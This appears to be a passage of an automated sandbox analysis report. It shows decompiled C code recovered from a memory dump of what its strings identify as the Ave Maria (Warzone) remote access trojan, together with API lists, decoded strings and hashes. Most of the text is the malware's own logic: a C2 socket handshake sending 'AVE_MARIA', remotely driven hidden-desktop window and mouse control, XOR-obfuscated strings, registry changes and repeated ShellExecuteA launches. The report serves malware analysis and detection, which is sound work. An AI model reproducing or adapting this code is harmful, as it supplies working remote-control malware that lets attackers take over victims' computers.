									goto L75;
								} else {
									if(__eflags == 0) {
										_t215 = _t215 - _v516;
										_t165 = _t165 - _t228;
										_t250 = _t250 + _v516;
										_t222 = _t222 + _t228;
										L76:
										MoveWindow(_t206, _t165, _t215, _t222, _t250, 0);
										_v492 = _t206;
										goto L43;
									}
									_t236 = _v496;
									__eflags = _t236;
									if(__eflags == 0) {
										_t165 = _t165 - _v520;
										_t215 = _t215 - _v516;
										goto L76;
									}
									_t237 = _t236 - 8;
									__eflags = _t237;
									if(__eflags == 0) {
										L72:
										_t165 = _t165 - _v520;
										_t222 = _t222 + _v520;
										goto L76;
									}
									_t238 = _t237 - 1;
									__eflags = _t238;
									if(_t238 == 0) {
										L75:
										_t222 = _t222 - _v520;
										__eflags = _t222;
										goto L76;
									}
									__eflags = _t238 - 1;
									if(__eflags != 0) {
										goto L43;
									}
									_t215 = _t215 - _v516;
									_t250 = _t250 + _v516;
									goto L76;
								}
							}
							__eflags = 0;
							_v480 = 1;
							_v492 = 0;
							_t216 = 0;
							_v468 = 0x37363402;
							_v464 = 0x2b2b;
							_v462 = 0;
							do {
								_t48 = _t216 + 0x40; // 0x40
								 *(_t260 + _t216 + 0x44) =  *(_t260 + _t216 + 0x44) ^ _t48;
								_t216 = _t216 + 1;
								__eflags = _t216 - 6;
							} while (_t216 < 6);
							_v462 = 0;
							_t251 = FindWindowA( &_v468, 0);
							GetWindowRect(_t251,  &_v436);
							_push(_v512.y);
							__eflags = PtInRect( &_v436, _v512.x);
							if(__eflags == 0) {
								E00B4D0F0(_t227,  &_v376, 0, 0x104);
								_t260 = _t260 + 0xc;
								RealGetWindowClassA(_t206,  &_v376, 0x104);
								_v460 = 0x74707263;
								_t217 = 0;
								__eflags = 0;
								_v456 = 0x7d72;
								_v454 = 0;
								do {
									_t67 = _t217 + 0x40; // 0x40
									 *(_t260 + _t217 + 0x4c) =  *(_t260 + _t217 + 0x4c) ^ _t67;
									_t217 = _t217 + 1;
									__eflags = _t217 - 6;
								} while (_t217 < 6);
								_t72 =  &_v460; // 0x74707263
								_v454 = 0;
								__eflags = lstrcmpA( &_v376, _t72);
								if(__eflags != 0) {
									goto L30;
								}
								_t183 = SendMessageA(_t206, 0x1e1, 0, 0);
								_push(_v512.y);
								_t240 = _t183;
								_t254 = MenuItemFromPoint(0, _t240, _v512.x);
								GetMenuItemID(_t240, _t254);
								PostMessageA(_t206, 0x1e5, _t254, 0);
								PostMessageA(_t206, 0x100, 0xd, 0);
								goto L43;
							}
							PostMessageA(_t251, 0xf5, 0, 0);
							goto L43;
						}
						_v480 = 0;
						_t189 = SendMessageA(_t206, 0x84, 0, _v504);
						__eflags = _t189 - 0xffffffff;
						if(__eflags == 0) {
							SetWindowLongA(_t206, 0xfffffff0, GetWindowLongA(_t206, 0xfffffff0) | 0x08000000);
							SendMessageA(_t206, 0x84, 0, _v504);
							goto L30;
						}
						__eflags = _t189 - 8;
						if(__eflags == 0) {
							_push(0);
							_push(0xf020);
							L34:
							_push(0x112);
							L29:
							PostMessageA(_t206, ??, ??, ??);
							goto L30;
						}
						__eflags = _t189 - 9;
						if(_t189 == 9) {
							_v420.length = 0x2c;
							GetWindowPlacement(_t206,  &_v420);
							__eflags = _v420.flags & 0x00000003;
							_push(0);
							if(__eflags == 0) {
								_push(0xf030);
							} else {
								_push(0xf120);
							}
							goto L34;
						}
						__eflags = _t189 - 0x14;
						if(__eflags != 0) {
							goto L30;
						}
						_push(0);
						_push(0);
						_push(0x10);
						goto L29;
					}
					if(_t268 == 0) {
						E00B44F57(_t206, _t225, _t245, __eflags);
						goto L31;
					}
					if(_t139 < 0x100) {
						goto L23;
					}
					if(_t139 <= 0x102) {
						_t218 = _v488.y;
						_t198 = _v488;
						_push(_t218);
						_v512 = _t198;
						_v512.y = _t218;
						_t206 = WindowFromPoint(_t198);
						goto L31;
					}
					if(_t139 == 0x401) {
						E00B457CD(_t206, _t225, _t245, _t257);
						goto L31;
					}
					if(_t139 == 0x402) {
						CreateThread(0, 0, E00B45A71, 0, 0, 0);
						goto L31;
					}
					_t273 = _t139 - 0x403;
					if(_t139 != 0x403) {
						goto L23;
					}
					E00B44A91(_t206, _t225, _t245, _t257, _t273);
					goto L31;
				}
				_t204 = 0;
				goto L46;
			}

APIs

Part of subcall function 00B446F7: WSAStartup.WS2_32(00000202,?), ref: 00B44718
Part of subcall function 00B446F7: socket.WS2_32(00000002,00000001,00000000), ref: 00B44729
Part of subcall function 00B446F7: gethostbyname.WS2_32(00B6AD28), ref: 00B4473B
Part of subcall function 00B446F7: htons.WS2_32(00000000), ref: 00B44763
Part of subcall function 00B446F7: connect.WS2_32(00000000,?,00000010), ref: 00B44774

SetThreadDesktop.USER32 ref: 00B45BDF
send.WS2_32(00000000,AVE_MARIA,0000000A,00000000), ref: 00B45BF6
send.WS2_32(00000000,?), ref: 00B45C11
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C2A
CreateThread.KERNEL32(00000000,00000000,Function_00014798,00000000,00000000,00000000), ref: 00B45C3E

Part of subcall function 00B457CD: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,000F003F,?), ref: 00B45892
Part of subcall function 00B457CD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00B458BA
Part of subcall function 00B457CD: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000004,?,?), ref: 00B458DC
Part of subcall function 00B457CD: GetWindowsDirectoryA.KERNEL32(?,00000104,770BE3A0,?,00000000), ref: 00B458FE
Part of subcall function 00B457CD: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00B4592A

recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C6B
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C83
recv.WS2_32(00000000,?,00000004,00000000), ref: 00B45C97
CreateThread.KERNEL32(00000000,00000000,Function_00015A71,00000000,00000000,00000000), ref: 00B45CF1

Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000,00000000,770BE3A0,?,?), ref: 00B44ADE
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?), ref: 00B44B2F
Part of subcall function 00B44A91: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,00000000), ref: 00B44B52
Part of subcall function 00B44A91: lstrcatA.KERNEL32(00000000,?,?), ref: 00B44B9B

WindowFromPoint.USER32(?,00000001), ref: 00B45D18
WindowFromPoint.USER32(00000000,?), ref: 00B45D82
SendMessageA.USER32 ref: 00B45DAF
PostMessageA.USER32(00000000,00000112,0000F020,00000000), ref: 00B45DCA
ScreenToClient.USER32 ref: 00B45DDA
GetWindowPlacement.USER32(00000000,?), ref: 00B45DFC
GetWindowLongA.USER32 ref: 00B45E28
SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00B45E37
SendMessageA.USER32 ref: 00B45E48
FindWindowA.USER32(?,00000000), ref: 00B45E94
GetWindowRect.USER32 ref: 00B45EA2
PtInRect.USER32(?,?,?), ref: 00B45EB5
PostMessageA.USER32(00000000,000000F5,00000000,00000000), ref: 00B45EC9
recv.WS2_32(?,00000200,00000004,00000000), ref: 00B45EE3
TerminateThread.KERNEL32(00000000), ref: 00B45EF6
RealGetWindowClassA.USER32(00000000,?,00000104), ref: 00B45F37
lstrcmpA.KERNEL32(?,crpt), ref: 00B45F72
SendMessageA.USER32 ref: 00B45F8A
MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 00B45F9C
GetMenuItemID.USER32(00000000,00000000), ref: 00B45FA6
PostMessageA.USER32(00000000,000001E5,00000000,00000000), ref: 00B45FBB
PostMessageA.USER32(00000000,00000100,0000000D,00000000), ref: 00B45FC7
SendMessageA.USER32 ref: 00B45FFA
GetWindowRect.USER32 ref: 00B4601E
MoveWindow.USER32(?,?,00000004,00000000,00000004,00000000), ref: 00B460C9
ScreenToClient.USER32 ref: 00B460F8
ChildWindowFromPoint.USER32 ref: 00B46107
PostMessageA.USER32(00000000,?,?,?), ref: 00B4613D

Strings

AVE_MARIA, xrefs: 00B45BF0
crpt, xrefs: 00B45F60, 00B45F69
,, xrefs: 00B45DF2
r}, xrefs: 00B45F47
++, xrefs: 00B45E72

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Message$Postrecv$FromPointSendThread$Rectlstrcat$ClientCreateFolderItemLongMenuPathScreenValuesend$ChildClassDesktopDirectoryFindMoveOpenPlacementQueryRealStartupTerminateWindowsconnectgethostbynamehtonslstrcmpsocket
String ID: ++$,$AVE_MARIA$crpt$r}
API String ID: 3286681106-786296257
Opcode ID: 2670f26e8ad0c852eaeec26d803b76456e619ec3898897f3d79ec0c6456bd516
Instruction ID: 7bd856bc1f9f3534aab8fe10c13b104995754a2dcf3a9439685b0e49f69d15f3
Opcode Fuzzy Hash: 2670f26e8ad0c852eaeec26d803b76456e619ec3898897f3d79ec0c6456bd516
Instruction Fuzzy Hash: 05F19071548701AFD7219F24CD88E2BBBE8EB8A744F10095DF585A3291DBB4DA04EB63

Uniqueness

Uniqueness Score: -1.00%

Function 00B49CBF, Relevance: 35.5, APIs: 5, Strings: 15, Instructions: 467
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E00B49CBF(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t145;
				intOrPtr* _t146;
				intOrPtr* _t147;
				intOrPtr* _t148;
				void _t149;
				void _t150;
				void _t153;
				void _t154;
				void _t157;
				void _t158;
				void _t161;
				void _t162;
				void _t165;
				void _t166;
				void* _t169;
				void _t170;
				void _t171;
				void* _t174;
				void _t175;
				void _t176;
				void* _t179;
				void _t180;
				void _t181;
				void* _t184;
				void _t185;
				void _t186;
				void* _t189;
				void _t190;
				void _t191;
				void _t194;
				void _t195;
				void* _t198;
				void _t199;
				void _t200;
				char* _t202;
				void* _t203;
				char* _t204;
				char* _t208;
				char* _t212;
				char* _t216;
				char* _t220;
				void* _t225;
				signed int _t226;
				char* _t228;
				char _t233;
				char _t235;
				char _t237;
				char _t239;
				char _t241;
				signed int _t243;
				signed int _t249;
				signed int _t255;
				signed int _t261;
				signed int _t267;
				signed int _t274;
				signed int _t281;
				signed int _t288;
				signed int _t295;
				signed int _t302;
				signed int _t308;
				signed int _t315;
				void* _t333;
				void* _t335;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t342;
				signed int _t343;
				void* _t344;
				signed int _t345;
				void* _t346;
				signed int _t347;
				void* _t348;
				signed int _t349;
				void* _t350;
				signed int _t351;
				void* _t352;
				signed int _t353;
				void* _t354;
				signed int _t355;
				void* _t356;
				signed int _t357;
				void* _t358;
				signed int _t359;
				void* _t360;
				signed int _t361;
				intOrPtr _t363;
				void* _t365;
				void* _t371;
				void* _t377;
				void* _t383;
				void* _t389;
				void* _t395;
				void* _t401;
				void* _t407;
				void* _t413;
				void* _t418;
				void* _t423;
				void* _t428;
				intOrPtr _t435;
				void* _t436;
				void* _t437;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t441;
				void* _t442;
				void* _t443;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t447;
				void* _t451;
				signed int _t452;
				signed int _t454;
				void* _t455;
				void* _t457;
				void* _t459;
				void* _t461;
				void* _t463;
				void* _t464;
				void* _t465;
				void* _t467;
				void* _t469;
				void* _t471;
				void* _t473;
				void* _t475;
				void* _t477;
				void* _t478;
				signed int _t479;

				_t134 =  *0xb69014; // 0xce6f0fb5
				 *(_t454 + 0x70) = _t134 ^ _t454;
				_t225 =  *(_t454 + 0x7c);
				_push(0x104);
				_t136 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x18)) = _t136;
				_t363 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x28)) = _t363;
				_t138 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x24)) = _t138;
				_t139 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x2c)) = _t139;
				_t435 = E00B509A2();
				_push(0x104);
				 *((intOrPtr*)(_t454 + 0x38)) = _t435;
				E00B509A2();
				_t455 = _t454 + 0x18;
				 *((intOrPtr*)(_t455 + 0x28)) = 0x31273235;
				_t9 = _t455 + 0x28; // 0x31273235
				 *((intOrPtr*)(_t455 + 0x2c)) = 0x222b242a;
				 *((char*)(_t455 + 0x30)) = 0;
				_t143 = E00B5187C(E00B49790(_t9));
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				_t451 = _t143;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t144 = E00B427DA(_t455 + 0x34);
				_t333 =  *((intOrPtr*)(_t455 + 0x10)) - _t144;
				do {
					_t233 =  *_t144;
					 *((char*)(_t144 + _t333)) = _t233;
					_t144 = _t144 + 1;
				} while (_t233 != 0);
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t145 = E00B427DA(_t455 + 0x34);
				_t335 = _t363 - _t145;
				do {
					_t235 =  *_t145;
					 *((char*)(_t145 + _t335)) = _t235;
					_t145 = _t145 + 1;
				} while (_t235 != 0);
				_t23 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t146 = E00B427DA(_t23);
				_t337 =  *((intOrPtr*)(_t455 + 0x14)) - _t146;
				do {
					_t237 =  *_t146;
					 *((char*)(_t146 + _t337)) = _t237;
					_t146 = _t146 + 1;
				} while (_t237 != 0);
				_t29 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t147 = E00B427DA(_t29);
				_t339 =  *((intOrPtr*)(_t455 + 0x18)) - _t147;
				do {
					_t239 =  *_t147;
					 *((char*)(_t147 + _t339)) = _t239;
					_t147 = _t147 + 1;
				} while (_t239 != 0);
				_t35 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t148 = E00B427DA(_t35);
				_t341 = _t435 - _t148;
				do {
					_t241 =  *_t148;
					 *((char*)(_t148 + _t341)) = _t241;
					_t148 = _t148 + 1;
				} while (_t241 != 0);
				_t342 = _t225;
				_t436 = _t225;
				do {
					_t149 =  *_t342;
					_t342 = _t342 + 1;
				} while (_t149 != 0);
				_t343 = _t342 - _t436;
				_t365 =  *((intOrPtr*)(_t455 + 0x10)) - 1;
				do {
					_t150 =  *(_t365 + 1);
					_t365 = _t365 + 1;
				} while (_t150 != 0);
				_t243 = _t343 >> 2;
				memcpy(_t365, _t436, _t243 << 2);
				_t344 = _t225;
				memcpy(_t436 + _t243 + _t243, _t436, _t343 & 0x00000003);
				_t457 = _t455 + 0x18;
				_t437 = _t344;
				do {
					_t153 =  *_t344;
					_t344 = _t344 + 1;
				} while (_t153 != 0);
				_t345 = _t344 - _t437;
				_t371 =  *((intOrPtr*)(_t457 + 0x1c)) - 1;
				do {
					_t154 =  *(_t371 + 1);
					_t371 = _t371 + 1;
				} while (_t154 != 0);
				_t249 = _t345 >> 2;
				memcpy(_t371, _t437, _t249 << 2);
				_t346 = _t225;
				memcpy(_t437 + _t249 + _t249, _t437, _t345 & 0x00000003);
				_t459 = _t457 + 0x18;
				_t438 = _t346;
				do {
					_t157 =  *_t346;
					_t346 = _t346 + 1;
				} while (_t157 != 0);
				_t347 = _t346 - _t438;
				_t377 =  *((intOrPtr*)(_t459 + 0x14)) - 1;
				do {
					_t158 =  *(_t377 + 1);
					_t377 = _t377 + 1;
				} while (_t158 != 0);
				_t255 = _t347 >> 2;
				memcpy(_t377, _t438, _t255 << 2);
				_t348 = _t225;
				memcpy(_t438 + _t255 + _t255, _t438, _t347 & 0x00000003);
				_t461 = _t459 + 0x18;
				_t439 = _t348;
				do {
					_t161 =  *_t348;
					_t348 = _t348 + 1;
				} while (_t161 != 0);
				_t349 = _t348 - _t439;
				_t383 =  *((intOrPtr*)(_t461 + 0x18)) - 1;
				do {
					_t162 =  *(_t383 + 1);
					_t383 = _t383 + 1;
				} while (_t162 != 0);
				_t261 = _t349 >> 2;
				memcpy(_t383, _t439, _t261 << 2);
				memcpy(_t439 + _t261 + _t261, _t439, _t349 & 0x00000003);
				_t463 = _t461 + 0x18;
				_t440 = _t225;
				do {
					_t165 =  *_t225;
					_t225 = _t225 + 1;
				} while (_t165 != 0);
				_t226 = _t225 - _t440;
				_t389 =  *((intOrPtr*)(_t463 + 0x20)) - 1;
				do {
					_t166 =  *(_t389 + 1);
					_t389 = _t389 + 1;
				} while (_t166 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t267 = _t226 >> 2;
				memcpy(_t389, _t440, _t267 << 2);
				_t464 = _t463 + 0xc;
				asm("movups [esp+0x34], xmm0");
				asm("movaps xmm0, [0xb3de90]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t464 + 0x74)) = 0xafc3d3ac;
				asm("movaps xmm0, [0xb3de50]");
				memcpy(_t440 + _t267 + _t267, _t440, _t226 & 0x00000003);
				_t465 = _t464 + 0xc;
				asm("movups [esp+0x54], xmm0");
				_t56 = _t465 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t465 + 0x78)) = 0xa5afc1d6;
				asm("movaps xmm0, [0xb3de20]");
				asm("movups [esp+0x64], xmm0");
				 *((char*)(_t465 + 0x7c)) = 0;
				_t169 = E00B4A2DD(_t56);
				_t350 = _t169;
				_t441 = _t169;
				do {
					_t170 =  *_t350;
					_t350 = _t350 + 1;
				} while (_t170 != 0);
				_t351 = _t350 - _t441;
				_t395 =  *((intOrPtr*)(_t465 + 0x10)) - 1;
				do {
					_t171 =  *(_t395 + 1);
					_t395 = _t395 + 1;
				} while (_t171 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t274 = _t351 >> 2;
				memcpy(_t395, _t441, _t274 << 2);
				memcpy(_t441 + _t274 + _t274, _t441, _t351 & 0x00000003);
				_t467 = _t465 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t62 = _t467 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t467 + 0x54)) = 0x26304d32;
				asm("movaps xmm0, [0xb3deb0]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t467 + 0x58)) = 0x26344925;
				 *((intOrPtr*)(_t467 + 0x5c)) = 0x422e3b44;
				 *((short*)(_t467 + 0x60)) = 0x4e;
				_t174 = E00B4A2F8(_t62);
				_t352 = _t174;
				_t442 = _t174;
				do {
					_t175 =  *_t352;
					_t352 = _t352 + 1;
				} while (_t175 != 0);
				_t353 = _t352 - _t442;
				_t401 =  *((intOrPtr*)(_t467 + 0x1c)) - 1;
				do {
					_t176 =  *(_t401 + 1);
					_t401 = _t401 + 1;
				} while (_t176 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t281 = _t353 >> 2;
				memcpy(_t401, _t442, _t281 << 2);
				memcpy(_t442 + _t281 + _t281, _t442, _t353 & 0x00000003);
				_t469 = _t467 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t70 = _t469 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t469 + 0x64)) = 0x5a36235c;
				asm("movaps xmm0, [0xb3dd00]");
				asm("movups [esp+0x44], xmm0");
				 *((short*)(_t469 + 0x68)) = 0x56;
				asm("movaps xmm0, [0xb3dd30]");
				asm("movups [esp+0x54], xmm0");
				_t179 = E00B4A2C2(_t70);
				_t354 = _t179;
				_t443 = _t179;
				do {
					_t180 =  *_t354;
					_t354 = _t354 + 1;
				} while (_t180 != 0);
				_t355 = _t354 - _t443;
				_t407 =  *((intOrPtr*)(_t469 + 0x14)) - 1;
				do {
					_t181 =  *(_t407 + 1);
					_t407 = _t407 + 1;
				} while (_t181 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t288 = _t355 >> 2;
				memcpy(_t407, _t443, _t288 << 2);
				memcpy(_t443 + _t288 + _t288, _t443, _t355 & 0x00000003);
				_t471 = _t469 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t76 = _t471 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t471 + 0x54)) = 0x2227334c;
				asm("movaps xmm0, [0xb3db20]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t471 + 0x58)) = 0x4b273748;
				 *((intOrPtr*)(_t471 + 0x5c)) = 0x49432d3a;
				 *((char*)(_t471 + 0x60)) = 0;
				_t184 = E00B4A2A7(_t76);
				_t356 = _t184;
				_t444 = _t184;
				do {
					_t185 =  *_t356;
					_t356 = _t356 + 1;
				} while (_t185 != 0);
				_t357 = _t356 - _t444;
				_t413 =  *((intOrPtr*)(_t471 + 0x18)) - 1;
				do {
					_t186 =  *(_t413 + 1);
					_t413 = _t413 + 1;
				} while (_t186 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t295 = _t357 >> 2;
				memcpy(_t413, _t444, _t295 << 2);
				memcpy(_t444 + _t295 + _t295, _t444, _t357 & 0x00000003);
				_t473 = _t471 + 0x18;
				_t84 = _t473 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t473 + 0x44)) = 0x36367e70;
				asm("movups [esp+0x34], xmm0");
				 *((intOrPtr*)(_t473 + 0x48)) = 0x75762c3a;
				 *((char*)(_t473 + 0x4c)) = 0;
				_t189 = E00B42CF5(_t84);
				_t358 = _t189;
				_t445 = _t189;
				do {
					_t190 =  *_t358;
					_t358 = _t358 + 1;
				} while (_t190 != 0);
				_t228 =  *(_t473 + 0x20);
				_t359 = _t358 - _t445;
				_t418 = _t228 - 1;
				do {
					_t191 =  *(_t418 + 1);
					_t418 = _t418 + 1;
				} while (_t191 != 0);
				_t302 = _t359 >> 2;
				memcpy(_t418, _t445, _t302 << 2);
				memcpy(_t445 + _t302 + _t302, _t445, _t359 & 0x00000003);
				_t475 = _t473 + 0x18;
				_t446 = _t451;
				do {
					_t194 =  *_t451;
					_t451 = _t451 + 1;
				} while (_t194 != 0);
				_t452 = _t451 - _t446;
				_t423 = _t228 - 1;
				do {
					_t195 =  *(_t423 + 1);
					_t423 = _t423 + 1;
				} while (_t195 != 0);
				asm("movaps xmm0, [0xb3dad0]");
				_t308 = _t452 >> 2;
				memcpy(_t423, _t446, _t308 << 2);
				memcpy(_t446 + _t308 + _t308, _t446, _t452 & 0x00000003);
				_t477 = _t475 + 0x18;
				_t95 = _t477 + 0x34; // 0x2a62226f
				asm("movups [esp+0x34], xmm0");
				_t198 = E00B42D2B(_t95);
				_t360 = _t198;
				_t447 = _t198;
				do {
					_t199 =  *_t360;
					_t360 = _t360 + 1;
				} while (_t199 != 0);
				_t361 = _t360 - _t447;
				_t428 = _t228 - 1;
				do {
					_t200 =  *(_t428 + 1);
					_t428 = _t428 + 1;
				} while (_t200 != 0);
				 *((intOrPtr*)(_t477 + 0x28)) = 0x6d262c23;
				_t315 = _t361 >> 2;
				_t202 = memcpy(_t428, _t447, _t315 << 2);
				_t478 = _t477 + 0xc;
				 *((intOrPtr*)(_t478 + 0x2c)) = 0x233d21;
				 *((intOrPtr*)(_t478 + 0x24)) = 0x2d27312f;
				_t203 = memcpy(_t447 + _t315 + _t315, _t447, _t361 & 0x00000003);
				_t479 = _t478 + 0xc;
				_t103 = _t479 + 0x34; // 0x2a62226f
				 *(_t479 + 0x30) = _t203;
				_t204 = E00B46346(_t103);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t204,  *(_t478 + 0x18), _t202, _t202);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				_t107 = _t479 + 0x24; // 0x2d27312f
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t208 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t208,  *_t107, 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t212 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t212,  *(_t479 + 0x1c), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t216 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t216,  *(_t479 + 0x20), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t220 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t220, _t228, 0, 0);
				return E00B4AE43( *(_t479 + 0x80) ^ _t479);
			}

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A18C
ShellExecuteA.SHELL32(00000000,00000000,00000000,/1'-,00000000,00000000), ref: 00B4A1CC
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A20C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A24C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A289

Strings

L3'", xrefs: 00B4A04A
\#6Z, xrefs: 00B49FE6
p~66, xrefs: 00B4A0AA
o"b*, xrefs: 00B49DA0
N, xrefs: 00B49FA2
/1'-, xrefs: 00B4A26B
H7'K, xrefs: 00B4A05E
:-CI, xrefs: 00B4A066
/1'-, xrefs: 00B4A19E
'$%+, xrefs: 00B49E0E
52'1, xrefs: 00B49D21
V, xrefs: 00B49FFA
!=#, xrefs: 00B4A263
;ih, xrefs: 00B49E16
:,vu, xrefs: 00B4A0B7

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$'$%+$/1'-$/1'-$52'1$:,vu$:-CI$;ih$H7'K$L3'"$N$V$\#6Z$o"b*$p~66
API String ID: 587946157-1764487608
Opcode ID: ed18a621e6392cb6aabb3583f76291f4ecaa4ed4fbdf650020e51b38c3f3c0c8
Instruction ID: 71fd287016c26cd315b4cbc2874510c08d5545d827575ed635e6f3ac3a6e81a5
Opcode Fuzzy Hash: ed18a621e6392cb6aabb3583f76291f4ecaa4ed4fbdf650020e51b38c3f3c0c8
Instruction Fuzzy Hash: 590213605087859FCB16DF2895902ABFBE2FFD9700F449A8CF8C657211DF319A4ADB12

Uniqueness

Uniqueness Score: -1.00%

Function 00B499C5, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00B499C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t55;
				intOrPtr _t57;
				char _t60;
				void _t61;
				void _t62;
				void _t66;
				void _t67;
				void _t70;
				void _t71;
				void* _t73;
				void _t75;
				void _t76;
				int _t78;
				char* _t79;
				char* _t80;
				void* _t85;
				signed int _t86;
				char* _t87;
				void* _t90;
				intOrPtr* _t91;
				signed int _t93;
				void* _t98;
				signed int _t100;
				signed int _t106;
				void* _t111;
				signed int _t113;
				void* _t123;
				void* _t124;
				signed int _t125;
				void* _t126;
				signed int _t127;
				intOrPtr _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t158;
				signed int _t159;
				signed int _t161;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t55 =  *0xb69014; // 0xce6f0fb5
				 *(_t161 + 0x3c) = _t55 ^ _t161;
				_t85 =  *(_t161 + 0x4c);
				_t158 =  *(_t161 + 0x4c);
				_push(0x208);
				_t57 = E00B509A2();
				asm("movaps xmm0, [0xb3dcd0]");
				_t129 = _t57;
